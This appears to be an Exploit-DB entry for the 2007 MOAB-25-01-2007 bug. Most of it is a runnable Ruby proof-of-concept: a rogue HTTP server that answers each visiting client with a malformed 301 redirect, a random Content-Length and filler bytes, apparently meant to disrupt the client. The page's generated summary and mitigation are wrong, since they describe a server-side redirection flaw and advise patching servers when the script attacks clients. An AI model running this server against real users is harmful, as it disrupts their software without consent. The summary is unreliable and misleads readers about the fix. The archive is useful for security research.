Proof of Concept for MOAB-25-01-2007

vendor:

by:

Lance M. Havok

5.5

CVSS

MEDIUM

HTTP Server Redirect

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Proof of Concept for MOAB-25-01-2007

This script demonstrates a proof of concept for the MOAB-25-01-2007 vulnerability. It starts an HTTP server on the specified port (default 80) and waits for incoming connections. When a connection is made, it generates a random content length and extracts the user agent from the request. It then responds with a 301 redirect to a non-existent URL and sends a response body filled with 'X' characters of the random content length. This vulnerability can be used for HTTP server redirection attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to update the affected HTTP server software to the latest version, as this vulnerability was reported and addressed in 2007.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com>
# Proof of concept for MOAB-25-01-2007.
#

require 'socket'

web_port = (ARGV[0] || 80).to_i

puts "++ Starting HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  rand_clen = rand(80)
  useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp!
  puts "++ Connected: #{useragent}"
  session.print "HTTP/1.1 301 OK\r\n"
  session.print "Content-Type: text/html\r\n"
  session.print "Content-Length: #{rand_clen}\r\n"
  session.print "Location: http://nonexistent123\r\n\r\n"
  session.print "X" * rand_clen
  session.close
end

# milw0rm.com [2007-01-25]